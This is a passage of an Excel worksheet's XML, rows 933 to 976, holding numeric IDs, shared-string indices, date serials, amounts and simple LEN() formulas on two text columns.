        <f>LEN(I933)</f>
        <v>13</v>
      </c>
      <c r="L933">
        <f>LEN(J933)</f>
        <v>9</v>
      </c>
    </row>
    <row r="934" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A934">
        <v>20767</v>
      </c>
      <c r="B934">
        <v>2802</v>
      </c>
      <c r="C934" t="s">
        <v>7004</v>
      </c>
      <c r="D934" t="s">
        <v>10964</v>
      </c>
      <c r="E934">
        <v>8</v>
      </c>
      <c r="F934" t="s">
        <v>10965</v>
      </c>
      <c r="G934" s="1">
        <v>44116</v>
      </c>
      <c r="H934">
        <v>1440</v>
      </c>
      <c r="I934" t="s">
        <v>10966</v>
      </c>
      <c r="J934" t="s">
        <v>9949</v>
      </c>
      <c r="K934">
        <f>LEN(I934)</f>
        <v>13</v>
      </c>
      <c r="L934">
        <f>LEN(J934)</f>
        <v>9</v>
      </c>
    </row>
    <row r="935" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A935">
        <v>17247</v>
      </c>
      <c r="B935">
        <v>2191</v>
      </c>
      <c r="C935" t="s">
        <v>5521</v>
      </c>
      <c r="D935" t="s">
        <v>9744</v>
      </c>
      <c r="E935">
        <v>5</v>
      </c>
      <c r="F935" t="s">
        <v>9527</v>
      </c>
      <c r="G935" s="1">
        <v>43871</v>
      </c>
      <c r="H935">
        <v>500</v>
      </c>
      <c r="I935" t="s">
        <v>9638</v>
      </c>
      <c r="J935" t="s">
        <v>9624</v>
      </c>
      <c r="K935">
        <f>LEN(I935)</f>
        <v>10</v>
      </c>
      <c r="L935">
        <f>LEN(J935)</f>
        <v>9</v>
      </c>
    </row>
    <row r="936" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A936">
        <v>17735</v>
      </c>
      <c r="B936">
        <v>2191</v>
      </c>
      <c r="C936" t="s">
        <v>5521</v>
      </c>
      <c r="D936" t="s">
        <v>9744</v>
      </c>
      <c r="E936">
        <v>5</v>
      </c>
      <c r="F936" t="s">
        <v>9814</v>
      </c>
      <c r="G936" s="1">
        <v>43871</v>
      </c>
      <c r="H936">
        <v>10000</v>
      </c>
      <c r="I936" t="s">
        <v>9638</v>
      </c>
      <c r="J936" t="s">
        <v>9624</v>
      </c>
      <c r="K936">
        <f>LEN(I936)</f>
        <v>10</v>
      </c>
      <c r="L936">
        <f>LEN(J936)</f>
        <v>9</v>
      </c>
    </row>
    <row r="937" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A937">
        <v>17736</v>
      </c>
      <c r="B937">
        <v>2191</v>
      </c>
      <c r="C937" t="s">
        <v>5521</v>
      </c>
      <c r="D937" t="s">
        <v>9744</v>
      </c>
      <c r="E937">
        <v>5</v>
      </c>
      <c r="F937" t="s">
        <v>9815</v>
      </c>
      <c r="G937" s="1">
        <v>43871</v>
      </c>
      <c r="H937">
        <v>10000</v>
      </c>
      <c r="I937" t="s">
        <v>9638</v>
      </c>
      <c r="J937" t="s">
        <v>9624</v>
      </c>
      <c r="K937">
        <f>LEN(I937)</f>
        <v>10</v>
      </c>
      <c r="L937">
        <f>LEN(J937)</f>
        <v>9</v>
      </c>
    </row>
    <row r="938" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A938">
        <v>19907</v>
      </c>
      <c r="B938">
        <v>2340</v>
      </c>
      <c r="C938" t="s">
        <v>5166</v>
      </c>
      <c r="D938" t="s">
        <v>10318</v>
      </c>
      <c r="E938">
        <v>5</v>
      </c>
      <c r="F938" t="s">
        <v>10321</v>
      </c>
      <c r="G938" s="1">
        <v>43881</v>
      </c>
      <c r="H938">
        <v>75000</v>
      </c>
      <c r="I938" t="s">
        <v>9638</v>
      </c>
      <c r="J938" t="s">
        <v>9624</v>
      </c>
      <c r="K938">
        <f>LEN(I938)</f>
        <v>10</v>
      </c>
      <c r="L938">
        <f>LEN(J938)</f>
        <v>9</v>
      </c>
    </row>
    <row r="939" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A939">
        <v>19932</v>
      </c>
      <c r="B939">
        <v>2563</v>
      </c>
      <c r="C939" t="s">
        <v>5432</v>
      </c>
      <c r="D939" t="s">
        <v>10341</v>
      </c>
      <c r="E939">
        <v>5</v>
      </c>
      <c r="F939" t="s">
        <v>5434</v>
      </c>
      <c r="G939" s="1">
        <v>43913</v>
      </c>
      <c r="H939">
        <v>12000</v>
      </c>
      <c r="I939" t="s">
        <v>9638</v>
      </c>
      <c r="J939" t="s">
        <v>9624</v>
      </c>
      <c r="K939">
        <f>LEN(I939)</f>
        <v>10</v>
      </c>
      <c r="L939">
        <f>LEN(J939)</f>
        <v>9</v>
      </c>
    </row>
    <row r="940" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A940">
        <v>20156</v>
      </c>
      <c r="B940">
        <v>2110</v>
      </c>
      <c r="C940" t="s">
        <v>5697</v>
      </c>
      <c r="D940" t="s">
        <v>10516</v>
      </c>
      <c r="E940">
        <v>5</v>
      </c>
      <c r="F940" t="s">
        <v>10517</v>
      </c>
      <c r="G940" s="1">
        <v>43930</v>
      </c>
      <c r="H940">
        <v>10000</v>
      </c>
      <c r="I940" t="s">
        <v>9638</v>
      </c>
      <c r="J940" t="s">
        <v>9624</v>
      </c>
      <c r="K940">
        <f>LEN(I940)</f>
        <v>10</v>
      </c>
      <c r="L940">
        <f>LEN(J940)</f>
        <v>9</v>
      </c>
    </row>
    <row r="941" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A941">
        <v>20157</v>
      </c>
      <c r="B941">
        <v>2110</v>
      </c>
      <c r="C941" t="s">
        <v>5697</v>
      </c>
      <c r="D941" t="s">
        <v>10516</v>
      </c>
      <c r="E941">
        <v>5</v>
      </c>
      <c r="F941" t="s">
        <v>10419</v>
      </c>
      <c r="G941" s="1">
        <v>43930</v>
      </c>
      <c r="H941">
        <v>10000</v>
      </c>
      <c r="I941" t="s">
        <v>9638</v>
      </c>
      <c r="J941" t="s">
        <v>9624</v>
      </c>
      <c r="K941">
        <f>LEN(I941)</f>
        <v>10</v>
      </c>
      <c r="L941">
        <f>LEN(J941)</f>
        <v>9</v>
      </c>
    </row>
    <row r="942" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A942">
        <v>20158</v>
      </c>
      <c r="B942">
        <v>2110</v>
      </c>
      <c r="C942" t="s">
        <v>5697</v>
      </c>
      <c r="D942" t="s">
        <v>10516</v>
      </c>
      <c r="E942">
        <v>5</v>
      </c>
      <c r="F942" t="s">
        <v>3814</v>
      </c>
      <c r="G942" s="1">
        <v>43930</v>
      </c>
      <c r="H942">
        <v>10000</v>
      </c>
      <c r="I942" t="s">
        <v>9638</v>
      </c>
      <c r="J942" t="s">
        <v>9624</v>
      </c>
      <c r="K942">
        <f>LEN(I942)</f>
        <v>10</v>
      </c>
      <c r="L942">
        <f>LEN(J942)</f>
        <v>9</v>
      </c>
    </row>
    <row r="943" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A943">
        <v>20246</v>
      </c>
      <c r="B943">
        <v>1758</v>
      </c>
      <c r="C943" t="s">
        <v>5725</v>
      </c>
      <c r="D943" t="s">
        <v>10578</v>
      </c>
      <c r="E943">
        <v>5</v>
      </c>
      <c r="F943" t="s">
        <v>547</v>
      </c>
      <c r="G943" s="1">
        <v>43930</v>
      </c>
      <c r="H943">
        <v>250</v>
      </c>
      <c r="I943" t="s">
        <v>9638</v>
      </c>
      <c r="J943" t="s">
        <v>9624</v>
      </c>
      <c r="K943">
        <f>LEN(I943)</f>
        <v>10</v>
      </c>
      <c r="L943">
        <f>LEN(J943)</f>
        <v>9</v>
      </c>
    </row>
    <row r="944" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A944">
        <v>20247</v>
      </c>
      <c r="B944">
        <v>1758</v>
      </c>
      <c r="C944" t="s">
        <v>5725</v>
      </c>
      <c r="D944" t="s">
        <v>10578</v>
      </c>
      <c r="E944">
        <v>5</v>
      </c>
      <c r="F944" t="s">
        <v>9648</v>
      </c>
      <c r="G944" s="1">
        <v>43930</v>
      </c>
      <c r="H944">
        <v>100</v>
      </c>
      <c r="I944" t="s">
        <v>9638</v>
      </c>
      <c r="J944" t="s">
        <v>9624</v>
      </c>
      <c r="K944">
        <f>LEN(I944)</f>
        <v>10</v>
      </c>
      <c r="L944">
        <f>LEN(J944)</f>
        <v>9</v>
      </c>
    </row>
    <row r="945" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A945">
        <v>20490</v>
      </c>
      <c r="B945">
        <v>756</v>
      </c>
      <c r="C945" t="s">
        <v>962</v>
      </c>
      <c r="D945" t="s">
        <v>10752</v>
      </c>
      <c r="E945">
        <v>5</v>
      </c>
      <c r="F945" t="s">
        <v>10755</v>
      </c>
      <c r="G945" s="1">
        <v>43949</v>
      </c>
      <c r="H945">
        <v>10000</v>
      </c>
      <c r="I945" t="s">
        <v>9638</v>
      </c>
      <c r="J945" t="s">
        <v>9624</v>
      </c>
      <c r="K945">
        <f>LEN(I945)</f>
        <v>10</v>
      </c>
      <c r="L945">
        <f>LEN(J945)</f>
        <v>9</v>
      </c>
    </row>
    <row r="946" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A946">
        <v>16722</v>
      </c>
      <c r="B946">
        <v>2016</v>
      </c>
      <c r="C946" t="s">
        <v>5283</v>
      </c>
      <c r="D946" t="s">
        <v>9488</v>
      </c>
      <c r="E946">
        <v>14</v>
      </c>
      <c r="F946" t="s">
        <v>9502</v>
      </c>
      <c r="G946" s="1">
        <v>43864</v>
      </c>
      <c r="H946">
        <v>100000</v>
      </c>
      <c r="J946" t="s">
        <v>9501</v>
      </c>
      <c r="K946">
        <f>LEN(I946)</f>
        <v>0</v>
      </c>
      <c r="L946">
        <f>LEN(J946)</f>
        <v>9</v>
      </c>
    </row>
    <row r="947" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A947">
        <v>17016</v>
      </c>
      <c r="B947">
        <v>2217</v>
      </c>
      <c r="C947" t="s">
        <v>6370</v>
      </c>
      <c r="D947" t="s">
        <v>16343</v>
      </c>
      <c r="E947">
        <v>5</v>
      </c>
      <c r="F947" t="s">
        <v>9623</v>
      </c>
      <c r="G947" s="1">
        <v>44252</v>
      </c>
      <c r="H947" s="4">
        <v>20000</v>
      </c>
      <c r="J947" t="s">
        <v>9624</v>
      </c>
      <c r="K947">
        <f>LEN(I947)</f>
        <v>0</v>
      </c>
      <c r="L947">
        <f>LEN(J947)</f>
        <v>9</v>
      </c>
    </row>
    <row r="948" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A948">
        <v>17018</v>
      </c>
      <c r="B948">
        <v>2217</v>
      </c>
      <c r="C948" t="s">
        <v>6370</v>
      </c>
      <c r="D948" t="s">
        <v>16343</v>
      </c>
      <c r="E948">
        <v>5</v>
      </c>
      <c r="F948" t="s">
        <v>9625</v>
      </c>
      <c r="G948" s="1">
        <v>44252</v>
      </c>
      <c r="H948" s="4">
        <v>20000</v>
      </c>
      <c r="J948" t="s">
        <v>9624</v>
      </c>
      <c r="K948">
        <f>LEN(I948)</f>
        <v>0</v>
      </c>
      <c r="L948">
        <f>LEN(J948)</f>
        <v>9</v>
      </c>
    </row>
    <row r="949" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A949">
        <v>17019</v>
      </c>
      <c r="B949">
        <v>2217</v>
      </c>
      <c r="C949" t="s">
        <v>6370</v>
      </c>
      <c r="D949" t="s">
        <v>16343</v>
      </c>
      <c r="E949">
        <v>5</v>
      </c>
      <c r="F949" t="s">
        <v>9626</v>
      </c>
      <c r="G949" s="1">
        <v>44252</v>
      </c>
      <c r="H949" s="4">
        <v>20000</v>
      </c>
      <c r="J949" t="s">
        <v>9624</v>
      </c>
      <c r="K949">
        <f>LEN(I949)</f>
        <v>0</v>
      </c>
      <c r="L949">
        <f>LEN(J949)</f>
        <v>9</v>
      </c>
    </row>
    <row r="950" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A950">
        <v>17099</v>
      </c>
      <c r="B950">
        <v>2275</v>
      </c>
      <c r="C950" t="s">
        <v>5873</v>
      </c>
      <c r="D950" t="s">
        <v>9657</v>
      </c>
      <c r="E950">
        <v>5</v>
      </c>
      <c r="F950" t="s">
        <v>9610</v>
      </c>
      <c r="G950" s="1">
        <v>44126</v>
      </c>
      <c r="H950">
        <v>5000</v>
      </c>
      <c r="J950" t="s">
        <v>9624</v>
      </c>
      <c r="K950">
        <f>LEN(I950)</f>
        <v>0</v>
      </c>
      <c r="L950">
        <f>LEN(J950)</f>
        <v>9</v>
      </c>
    </row>
    <row r="951" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A951">
        <v>17101</v>
      </c>
      <c r="B951">
        <v>2275</v>
      </c>
      <c r="C951" t="s">
        <v>5873</v>
      </c>
      <c r="D951" t="s">
        <v>9657</v>
      </c>
      <c r="E951">
        <v>5</v>
      </c>
      <c r="F951" t="s">
        <v>9658</v>
      </c>
      <c r="G951" s="1">
        <v>44126</v>
      </c>
      <c r="H951">
        <v>5000</v>
      </c>
      <c r="J951" t="s">
        <v>9624</v>
      </c>
      <c r="K951">
        <f>LEN(I951)</f>
        <v>0</v>
      </c>
      <c r="L951">
        <f>LEN(J951)</f>
        <v>9</v>
      </c>
    </row>
    <row r="952" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A952">
        <v>17103</v>
      </c>
      <c r="B952">
        <v>2275</v>
      </c>
      <c r="C952" t="s">
        <v>5873</v>
      </c>
      <c r="D952" t="s">
        <v>9657</v>
      </c>
      <c r="E952">
        <v>5</v>
      </c>
      <c r="F952" t="s">
        <v>9661</v>
      </c>
      <c r="G952" s="1">
        <v>44126</v>
      </c>
      <c r="H952">
        <v>15000</v>
      </c>
      <c r="J952" t="s">
        <v>9624</v>
      </c>
      <c r="K952">
        <f>LEN(I952)</f>
        <v>0</v>
      </c>
      <c r="L952">
        <f>LEN(J952)</f>
        <v>9</v>
      </c>
    </row>
    <row r="953" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A953">
        <v>17147</v>
      </c>
      <c r="B953">
        <v>2275</v>
      </c>
      <c r="C953" t="s">
        <v>5873</v>
      </c>
      <c r="D953" t="s">
        <v>9657</v>
      </c>
      <c r="E953">
        <v>5</v>
      </c>
      <c r="F953" t="s">
        <v>9682</v>
      </c>
      <c r="G953" s="1">
        <v>44126</v>
      </c>
      <c r="H953">
        <v>10000</v>
      </c>
      <c r="J953" t="s">
        <v>9624</v>
      </c>
      <c r="K953">
        <f>LEN(I953)</f>
        <v>0</v>
      </c>
      <c r="L953">
        <f>LEN(J953)</f>
        <v>9</v>
      </c>
    </row>
    <row r="954" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A954">
        <v>17711</v>
      </c>
      <c r="B954">
        <v>1183</v>
      </c>
      <c r="C954" t="s">
        <v>2579</v>
      </c>
      <c r="D954" t="s">
        <v>9808</v>
      </c>
      <c r="E954">
        <v>16</v>
      </c>
      <c r="F954" t="s">
        <v>9527</v>
      </c>
      <c r="G954" s="1">
        <v>43861</v>
      </c>
      <c r="H954">
        <v>500</v>
      </c>
      <c r="J954" t="s">
        <v>9624</v>
      </c>
      <c r="K954">
        <f>LEN(I954)</f>
        <v>0</v>
      </c>
      <c r="L954">
        <f>LEN(J954)</f>
        <v>9</v>
      </c>
    </row>
    <row r="955" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A955">
        <v>17713</v>
      </c>
      <c r="B955">
        <v>1183</v>
      </c>
      <c r="C955" t="s">
        <v>2579</v>
      </c>
      <c r="D955" t="s">
        <v>9808</v>
      </c>
      <c r="E955">
        <v>16</v>
      </c>
      <c r="F955" t="s">
        <v>9437</v>
      </c>
      <c r="G955" s="1">
        <v>43861</v>
      </c>
      <c r="H955">
        <v>500</v>
      </c>
      <c r="J955" t="s">
        <v>9624</v>
      </c>
      <c r="K955">
        <f>LEN(I955)</f>
        <v>0</v>
      </c>
      <c r="L955">
        <f>LEN(J955)</f>
        <v>9</v>
      </c>
    </row>
    <row r="956" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A956">
        <v>17720</v>
      </c>
      <c r="B956">
        <v>1183</v>
      </c>
      <c r="C956" t="s">
        <v>2579</v>
      </c>
      <c r="D956" t="s">
        <v>9808</v>
      </c>
      <c r="E956">
        <v>16</v>
      </c>
      <c r="F956" t="s">
        <v>9813</v>
      </c>
      <c r="G956" s="1">
        <v>43861</v>
      </c>
      <c r="H956">
        <v>2000</v>
      </c>
      <c r="J956" t="s">
        <v>9624</v>
      </c>
      <c r="K956">
        <f>LEN(I956)</f>
        <v>0</v>
      </c>
      <c r="L956">
        <f>LEN(J956)</f>
        <v>9</v>
      </c>
    </row>
    <row r="957" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A957">
        <v>19423</v>
      </c>
      <c r="B957">
        <v>2155</v>
      </c>
      <c r="C957" t="s">
        <v>5100</v>
      </c>
      <c r="D957" t="s">
        <v>10025</v>
      </c>
      <c r="E957">
        <v>26</v>
      </c>
      <c r="F957" t="s">
        <v>9595</v>
      </c>
      <c r="G957" s="1">
        <v>44253</v>
      </c>
      <c r="H957">
        <v>20000</v>
      </c>
      <c r="J957" t="s">
        <v>9501</v>
      </c>
      <c r="K957">
        <f>LEN(I957)</f>
        <v>0</v>
      </c>
      <c r="L957">
        <f>LEN(J957)</f>
        <v>9</v>
      </c>
    </row>
    <row r="958" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A958">
        <v>19777</v>
      </c>
      <c r="B958">
        <v>2546</v>
      </c>
      <c r="C958" t="s">
        <v>5339</v>
      </c>
      <c r="D958" t="s">
        <v>10229</v>
      </c>
      <c r="E958">
        <v>5</v>
      </c>
      <c r="F958" t="s">
        <v>9676</v>
      </c>
      <c r="G958" s="1">
        <v>43896</v>
      </c>
      <c r="H958">
        <v>15000</v>
      </c>
      <c r="J958" t="s">
        <v>9624</v>
      </c>
      <c r="K958">
        <f>LEN(I958)</f>
        <v>0</v>
      </c>
      <c r="L958">
        <f>LEN(J958)</f>
        <v>9</v>
      </c>
    </row>
    <row r="959" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A959">
        <v>20106</v>
      </c>
      <c r="B959">
        <v>46</v>
      </c>
      <c r="C959" t="s">
        <v>658</v>
      </c>
      <c r="D959" t="s">
        <v>10470</v>
      </c>
      <c r="E959">
        <v>12</v>
      </c>
      <c r="F959" t="s">
        <v>1746</v>
      </c>
      <c r="G959" s="1">
        <v>43928</v>
      </c>
      <c r="H959">
        <v>1000</v>
      </c>
      <c r="J959" t="s">
        <v>10477</v>
      </c>
      <c r="K959">
        <f>LEN(I959)</f>
        <v>0</v>
      </c>
      <c r="L959">
        <f>LEN(J959)</f>
        <v>9</v>
      </c>
    </row>
    <row r="960" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A960">
        <v>20107</v>
      </c>
      <c r="B960">
        <v>46</v>
      </c>
      <c r="C960" t="s">
        <v>658</v>
      </c>
      <c r="D960" t="s">
        <v>10470</v>
      </c>
      <c r="E960">
        <v>12</v>
      </c>
      <c r="F960" t="s">
        <v>9681</v>
      </c>
      <c r="G960" s="1">
        <v>43928</v>
      </c>
      <c r="H960">
        <v>1000</v>
      </c>
      <c r="J960" t="s">
        <v>9501</v>
      </c>
      <c r="K960">
        <f>LEN(I960)</f>
        <v>0</v>
      </c>
      <c r="L960">
        <f>LEN(J960)</f>
        <v>9</v>
      </c>
    </row>
    <row r="961" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A961">
        <v>20188</v>
      </c>
      <c r="B961">
        <v>408</v>
      </c>
      <c r="C961" t="s">
        <v>457</v>
      </c>
      <c r="D961" t="s">
        <v>10533</v>
      </c>
      <c r="E961">
        <v>5</v>
      </c>
      <c r="F961" t="s">
        <v>9458</v>
      </c>
      <c r="G961" s="1">
        <v>43913</v>
      </c>
      <c r="H961">
        <v>62000</v>
      </c>
      <c r="J961" t="s">
        <v>9624</v>
      </c>
      <c r="K961">
        <f>LEN(I961)</f>
        <v>0</v>
      </c>
      <c r="L961">
        <f>LEN(J961)</f>
        <v>9</v>
      </c>
    </row>
    <row r="962" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A962">
        <v>20189</v>
      </c>
      <c r="B962">
        <v>408</v>
      </c>
      <c r="C962" t="s">
        <v>457</v>
      </c>
      <c r="D962" t="s">
        <v>10533</v>
      </c>
      <c r="E962">
        <v>5</v>
      </c>
      <c r="F962" t="s">
        <v>10534</v>
      </c>
      <c r="G962" s="1">
        <v>43913</v>
      </c>
      <c r="H962">
        <v>62000</v>
      </c>
      <c r="J962" t="s">
        <v>9624</v>
      </c>
      <c r="K962">
        <f>LEN(I962)</f>
        <v>0</v>
      </c>
      <c r="L962">
        <f>LEN(J962)</f>
        <v>9</v>
      </c>
    </row>
    <row r="963" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A963">
        <v>20279</v>
      </c>
      <c r="B963">
        <v>2676</v>
      </c>
      <c r="C963" t="s">
        <v>5653</v>
      </c>
      <c r="D963" t="s">
        <v>10521</v>
      </c>
      <c r="E963">
        <v>17</v>
      </c>
      <c r="F963" t="s">
        <v>10596</v>
      </c>
      <c r="G963" s="1">
        <v>43990</v>
      </c>
      <c r="H963">
        <v>8000</v>
      </c>
      <c r="J963" t="s">
        <v>9624</v>
      </c>
      <c r="K963">
        <f>LEN(I963)</f>
        <v>0</v>
      </c>
      <c r="L963">
        <f>LEN(J963)</f>
        <v>9</v>
      </c>
    </row>
    <row r="964" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A964">
        <v>20345</v>
      </c>
      <c r="B964">
        <v>899</v>
      </c>
      <c r="C964" t="s">
        <v>2943</v>
      </c>
      <c r="D964" t="s">
        <v>10644</v>
      </c>
      <c r="E964">
        <v>26</v>
      </c>
      <c r="F964" t="s">
        <v>9527</v>
      </c>
      <c r="G964" s="1">
        <v>44088</v>
      </c>
      <c r="H964">
        <v>0</v>
      </c>
      <c r="J964" t="s">
        <v>9501</v>
      </c>
      <c r="K964">
        <f>LEN(I964)</f>
        <v>0</v>
      </c>
      <c r="L964">
        <f>LEN(J964)</f>
        <v>9</v>
      </c>
    </row>
    <row r="965" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A965">
        <v>20347</v>
      </c>
      <c r="B965">
        <v>899</v>
      </c>
      <c r="C965" t="s">
        <v>2943</v>
      </c>
      <c r="D965" t="s">
        <v>10644</v>
      </c>
      <c r="E965">
        <v>26</v>
      </c>
      <c r="F965" t="s">
        <v>10647</v>
      </c>
      <c r="G965" s="1">
        <v>44088</v>
      </c>
      <c r="H965">
        <v>0</v>
      </c>
      <c r="J965" t="s">
        <v>9501</v>
      </c>
      <c r="K965">
        <f>LEN(I965)</f>
        <v>0</v>
      </c>
      <c r="L965">
        <f>LEN(J965)</f>
        <v>9</v>
      </c>
    </row>
    <row r="966" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A966">
        <v>20349</v>
      </c>
      <c r="B966">
        <v>899</v>
      </c>
      <c r="C966" t="s">
        <v>2943</v>
      </c>
      <c r="D966" t="s">
        <v>10644</v>
      </c>
      <c r="E966">
        <v>26</v>
      </c>
      <c r="F966" t="s">
        <v>10650</v>
      </c>
      <c r="G966" s="1">
        <v>44088</v>
      </c>
      <c r="H966">
        <v>0</v>
      </c>
      <c r="J966" t="s">
        <v>9501</v>
      </c>
      <c r="K966">
        <f>LEN(I966)</f>
        <v>0</v>
      </c>
      <c r="L966">
        <f>LEN(J966)</f>
        <v>9</v>
      </c>
    </row>
    <row r="967" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A967">
        <v>20535</v>
      </c>
      <c r="B967">
        <v>583</v>
      </c>
      <c r="C967" t="s">
        <v>1028</v>
      </c>
      <c r="D967" t="s">
        <v>10782</v>
      </c>
      <c r="E967">
        <v>26</v>
      </c>
      <c r="F967" t="s">
        <v>1030</v>
      </c>
      <c r="G967" s="1">
        <v>43952</v>
      </c>
      <c r="H967">
        <v>10000</v>
      </c>
      <c r="J967" t="s">
        <v>9624</v>
      </c>
      <c r="K967">
        <f>LEN(I967)</f>
        <v>0</v>
      </c>
      <c r="L967">
        <f>LEN(J967)</f>
        <v>9</v>
      </c>
    </row>
    <row r="968" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A968">
        <v>20596</v>
      </c>
      <c r="B968">
        <v>882</v>
      </c>
      <c r="C968" t="s">
        <v>2992</v>
      </c>
      <c r="D968" t="s">
        <v>10834</v>
      </c>
      <c r="E968">
        <v>2</v>
      </c>
      <c r="F968" t="s">
        <v>10836</v>
      </c>
      <c r="G968" s="1">
        <v>43991</v>
      </c>
      <c r="H968">
        <v>15800</v>
      </c>
      <c r="J968" t="s">
        <v>9501</v>
      </c>
      <c r="K968">
        <f>LEN(I968)</f>
        <v>0</v>
      </c>
      <c r="L968">
        <f>LEN(J968)</f>
        <v>9</v>
      </c>
    </row>
    <row r="969" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A969">
        <v>20725</v>
      </c>
      <c r="B969">
        <v>779</v>
      </c>
      <c r="C969" t="s">
        <v>1194</v>
      </c>
      <c r="D969" t="s">
        <v>10937</v>
      </c>
      <c r="E969">
        <v>11</v>
      </c>
      <c r="F969" t="s">
        <v>3686</v>
      </c>
      <c r="G969" s="1">
        <v>44179</v>
      </c>
      <c r="H969">
        <v>100000000</v>
      </c>
      <c r="J969" t="s">
        <v>9949</v>
      </c>
      <c r="K969">
        <f>LEN(I969)</f>
        <v>0</v>
      </c>
      <c r="L969">
        <f>LEN(J969)</f>
        <v>9</v>
      </c>
    </row>
    <row r="970" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A970">
        <v>21098</v>
      </c>
      <c r="B970">
        <v>475</v>
      </c>
      <c r="C970" t="s">
        <v>1519</v>
      </c>
      <c r="D970" t="s">
        <v>11137</v>
      </c>
      <c r="E970">
        <v>16</v>
      </c>
      <c r="F970" t="s">
        <v>11139</v>
      </c>
      <c r="G970" s="1">
        <v>44039</v>
      </c>
      <c r="H970">
        <v>0</v>
      </c>
      <c r="J970" t="s">
        <v>10625</v>
      </c>
      <c r="K970">
        <f>LEN(I970)</f>
        <v>0</v>
      </c>
      <c r="L970">
        <f>LEN(J970)</f>
        <v>9</v>
      </c>
    </row>
    <row r="971" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A971">
        <v>21101</v>
      </c>
      <c r="B971">
        <v>1143</v>
      </c>
      <c r="C971" t="s">
        <v>3125</v>
      </c>
      <c r="D971" t="s">
        <v>11140</v>
      </c>
      <c r="E971">
        <v>16</v>
      </c>
      <c r="F971" t="s">
        <v>9640</v>
      </c>
      <c r="G971" s="1">
        <v>44053</v>
      </c>
      <c r="H971">
        <v>10000</v>
      </c>
      <c r="J971" t="s">
        <v>9624</v>
      </c>
      <c r="K971">
        <f>LEN(I971)</f>
        <v>0</v>
      </c>
      <c r="L971">
        <f>LEN(J971)</f>
        <v>9</v>
      </c>
    </row>
    <row r="972" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A972">
        <v>21105</v>
      </c>
      <c r="B972">
        <v>1143</v>
      </c>
      <c r="C972" t="s">
        <v>3125</v>
      </c>
      <c r="D972" t="s">
        <v>11140</v>
      </c>
      <c r="E972">
        <v>16</v>
      </c>
      <c r="F972" t="s">
        <v>9674</v>
      </c>
      <c r="G972" s="1">
        <v>44053</v>
      </c>
      <c r="H972">
        <v>5000</v>
      </c>
      <c r="J972" t="s">
        <v>9624</v>
      </c>
      <c r="K972">
        <f>LEN(I972)</f>
        <v>0</v>
      </c>
      <c r="L972">
        <f>LEN(J972)</f>
        <v>9</v>
      </c>
    </row>
    <row r="973" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A973">
        <v>21157</v>
      </c>
      <c r="B973">
        <v>541</v>
      </c>
      <c r="C973" t="s">
        <v>1159</v>
      </c>
      <c r="D973" t="s">
        <v>11179</v>
      </c>
      <c r="E973">
        <v>16</v>
      </c>
      <c r="F973" t="s">
        <v>9505</v>
      </c>
      <c r="G973" s="1">
        <v>44034</v>
      </c>
      <c r="H973">
        <v>33000</v>
      </c>
      <c r="J973" t="s">
        <v>10625</v>
      </c>
      <c r="K973">
        <f>LEN(I973)</f>
        <v>0</v>
      </c>
      <c r="L973">
        <f>LEN(J973)</f>
        <v>9</v>
      </c>
    </row>
    <row r="974" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A974">
        <v>21158</v>
      </c>
      <c r="B974">
        <v>541</v>
      </c>
      <c r="C974" t="s">
        <v>1159</v>
      </c>
      <c r="D974" t="s">
        <v>11179</v>
      </c>
      <c r="E974">
        <v>16</v>
      </c>
      <c r="F974" t="s">
        <v>11180</v>
      </c>
      <c r="G974" s="1">
        <v>44034</v>
      </c>
      <c r="H974">
        <v>6000</v>
      </c>
      <c r="J974" t="s">
        <v>10625</v>
      </c>
      <c r="K974">
        <f>LEN(I974)</f>
        <v>0</v>
      </c>
      <c r="L974">
        <f>LEN(J974)</f>
        <v>9</v>
      </c>
    </row>
    <row r="975" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A975">
        <v>21159</v>
      </c>
      <c r="B975">
        <v>541</v>
      </c>
      <c r="C975" t="s">
        <v>1159</v>
      </c>
      <c r="D975" t="s">
        <v>11179</v>
      </c>
      <c r="E975">
        <v>16</v>
      </c>
      <c r="F975" t="s">
        <v>9955</v>
      </c>
      <c r="G975" s="1">
        <v>44034</v>
      </c>
      <c r="H975">
        <v>5000</v>
      </c>
      <c r="J975" t="s">
        <v>10625</v>
      </c>
      <c r="K975">
        <f>LEN(I975)</f>
        <v>0</v>
      </c>
      <c r="L975">
        <f>LEN(J975)</f>
        <v>9</v>
      </c>
    </row>
    <row r="976" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A976">
        <v>21160</v>
      </c>
      <c r="B976">
        <v>541</v>
      </c>
